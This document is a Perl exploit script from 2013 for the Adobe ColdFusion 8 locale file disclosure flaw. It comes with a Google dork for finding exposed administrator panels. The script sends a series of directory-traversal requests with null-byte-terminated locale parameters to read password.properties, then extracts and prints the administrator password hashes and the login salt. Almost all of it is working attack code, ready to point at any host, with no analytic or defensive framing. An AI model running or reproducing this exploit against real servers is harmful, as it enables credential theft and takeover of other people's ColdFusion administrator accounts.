#!/usr/bin/perl
# ColdFusion Locale File Disclosure exploit (without Metasploit)
# Google Dork: intitle:"Index of /CFIDE/" administrator
# Date: 30/07/2013
# Vendor Homepage: http://www.adobe.com/
# Author: D35m0nd142
# Tested on: Adobe ColdFusion 8 (using Backbox Linux operating system)
use LWP::UserAgent;
use HTTP::Request;
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02');
$target = $ARGV[0];
system("clear");
print "+--------------------------------------------------------+\n";
print " ColdFusion Locale File Disclosure exploit \n";
print " created by D35m0nd142 \n";
print "+--------------------------------------------------------+\n";
sleep 1;
if($target eq '')
{
print "Usage: perl cfexploit.pl <target>\n";
exit(1);
}
if($target !~ /http:\/\// )
{
$target = "http://$target";
}
@hosts = ("$target/CFIDE/administrator/index.cfm?locale=../../../../../../ColdFusion8/lib/password.properties%00en",
"$target/CFIDE/administrator/index.cfm?locale=../../../../../../../ColdFusion8/lib/password.properties%00en",
"$target/CFIDE/administrator/index.cfm?locale=../../../../../../../../ColdFusion8/lib/password.properties%00en",
"$target/CFIDE/administrator/index.cfm?locale=../../../../../../../../../ColdFusion8/lib/password.properties%00en",
"$target/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en",
"$target/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en",
"$target/CFIDE/wizards/common/_logintowizard.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en",
"$target/CFIDE/wizards/common/_logintowizard.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en",
"$target/CFIDE/administrator/archives/index.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en",
"$target/CFIDE/administrator/archives/index.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en",
"$target/CFIDE/administrator/entman/index.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en",
"$target/CFIDE/administrator/entman/index.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en",
"$target/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en",
"$target/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en",
"$target/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../JRun4/servers/cfusion/cfusion-ear/cfusion-war/WEB-INF/cfusion/lib/password.properties%00en");
print "\n... Exploiting ... \n";
foreach $host (@hosts)
{
$req = $agent->request(HTTP::Request->new(GET=>$host));
if($req->is_success && $req->content !~ /Not Found/ && $req->content !~ /Page not found/ && $req->content !~ /Forbidden/ && $req->content =~ /rdspassword=/ )
{
print "\n[+] Vulnerable URL: $host \n\n";
open(FILE, "> cf_content.txt");
print FILE $req->content;
close(FILE);
$grep = "grep 'password=' cf_content.txt > passwords.txt";
$head = "head -n 2 passwords.txt";
system($grep);
print "+-------------------------------------------------+\n";
print " [+] ColdFusion passwords: \n";
print "___________________________________________________\n";
system($head);
print "___________________________________________________\n";
sleep 1;
print "\n... Retrieving SALT ... \n\n";
sleep 1;
$grep = "grep '<input name=\"salt\" type=\"hidden\" value=' cf_content.txt > cf_salt.txt";
$salt_cut = "cut -d '=' -f 4 cf_salt.txt > cf_salt1.txt";
$salt_cut1 = "cut -d '\"' -f 2 cf_salt1.txt > cf_salt2.txt";
system($grep);
system($salt_cut);
system($salt_cut1);
print "+---------------------------+";
print "\n [+] SALT: \n";
print "_____________________________\n";
system("cat cf_salt2.txt");
print "_____________________________\n";
sleep(1.3);
exit(0);
}
else
{
open(FILE, ">> cf_content.txt");
print FILE "[-] not vulnerable!";
close(FILE);
}
}
